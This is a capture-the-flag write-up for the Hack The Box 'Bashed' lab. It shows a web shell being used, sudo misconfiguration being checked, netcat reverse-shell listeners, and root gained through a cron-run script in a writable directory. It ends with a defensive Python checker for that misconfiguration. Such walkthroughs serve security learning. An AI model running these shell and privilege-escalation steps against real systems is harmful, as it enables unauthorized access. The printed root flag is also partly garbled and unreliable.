This is my attempt to show how I solved HTB’s Bashed

JOURNEY TO OSCP

Bashed
OS: Linux
Difficulty: Easy
Points: 20
Release: 09 Dec 2017
IP: 10.10.10.68

Nmap:

Nikto:

Gobuster:

Looking at /dev leads me to a web shell


Gaining a Foothold:

[Screenshot: the web shell, running as www-data, lists / (bin, scripts, sys, usr, var, vmlinuz) and runs uname -a, which reports a Linux 4.4 x86_64 kernel.]

So on this machine I already have a low-privileged shell that lets me run Linux commands on the web server, so I don’t necessarily need to get my own reverse shell.

User.txt:

www-data@bashed:/# pwd
/
www-data@bashed:/# cd home
www-data@bashed:/home# ls
arrexel
www-data@bashed:/home# cd arrexel
www-data@bashed:/home/arrexel# ls
user.txt
www-data@bashed:/home/arrexel# cat user.txt
2c281f318555dbc1b856957c7147bfc1

As you can see, I can read the user.txt file from this low-privileged shell; now I need to get root privileges.

Root.txt:

Unfortunately, I’m not going to be able to get root from here so I need to get more creative.

I try sudo -l:

cd root
cd root
cd root
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset,
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

This command lists the commands my user is allowed to run.

The last two lines are particularly interesting because they say that the user I’m running in the context of (www-data) can run commands as the user scriptmanager without having to provide the user’s password. This might come in handy later on, but I’ll continue to do more enumeration.

Everything in the root directory seems to be owned by root except for the scripts directory, which is owned by scriptmanager, the user I can run commands as without a password.

The above command changes the user to scriptmanager.


Then enter:

nc -nlvp 1234 on the attack machine

root@kali:~/Tools/10.10.10.68# nc -lvnp 1234
listening on [any] 1234
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.68] 43392
/bin/sh: 0: can't access tty; job control turned off

sudo -i -u scriptmanager

root
run
sbin
scripts
usr
vmlinuz
$ sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
$ sudo -i -u scriptmanager
id
gid=1001(scriptmanager)

Using python -c 'import pty; pty.spawn("/bin/bash");' to escape the tty

We had to add a reverse shell

Wget it back onto the server, since test.py is being run as a cron job.

nc -nvlp 234
listening on [any] 234

It’s actually nc -nvlp 2345 lol

nc -nvlp 2345
listening on [any] 2345
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.68] 52180
/bin/sh: 0: can't access tty; job control turned off

And now we have root

nc -nvlp 2345
listening on [any] 2345
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.68] 52180
/bin/sh: 0: can't access tty; job control turned off
# pwd
/scripts
# ls
test.py
test.txt
# cd /
# pwd
/
# ls
bin
boot
dev
etc
home
initrd.img
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
scripts
sys
tmp
vmlinuz
# cd root
# pwd
/root
# ls
root.txt
# cat root.txt
cc4feafe3a1ß26d402ba1Ø329674a8eZ
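
The root step works because a cron job running as root executes test.py from /scripts, a directory that scriptmanager owns. As an added example (not part of the original write-up), this Python check walks a path that root executes and reports every component an untrusted account could modify; the function name, the trusted_uids parameter and the temporary demo layout are assumptions made for illustration.

```python
import os
import stat
import tempfile


def untrusted_components(path, trusted_uids=(0,)):
    """List (component, reason) for every part of `path` that an account
    outside `trusted_uids` could modify. A file root executes is only as
    safe as the file and each directory above it."""
    findings = []
    current = os.path.realpath(path)
    while True:
        st = os.stat(current)
        is_sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
        if st.st_uid not in trusted_uids:
            findings.append((current, f"owned by uid {st.st_uid}"))
        # A sticky directory (like /tmp) stops users replacing each other's
        # entries, so world/group write there is not counted.
        if not is_sticky_dir:
            if st.st_mode & stat.S_IWOTH:
                findings.append((current, "world-writable"))
            elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
                findings.append((current, f"writable by gid {st.st_gid}"))
        parent = os.path.dirname(current)
        if parent == current:  # reached the filesystem root
            break
        current = parent
    return findings


if __name__ == "__main__":
    # Constructed layout standing in for /scripts/test.py; the loose mode
    # plays the role of a directory a non-root account controls.
    base = os.path.realpath(tempfile.mkdtemp())
    scripts = os.path.join(base, "scripts")
    os.mkdir(scripts)
    os.chmod(scripts, 0o777)
    target = os.path.join(scripts, "test.py")
    open(target, "w").close()
    for component, reason in untrusted_components(target):
        print(f"{component}: {reason}")
```

On a real host, pass each file or directory named in root's crontab; any finding means that job can be redirected by a non-root account and the path should be re-owned to root with group and world write removed.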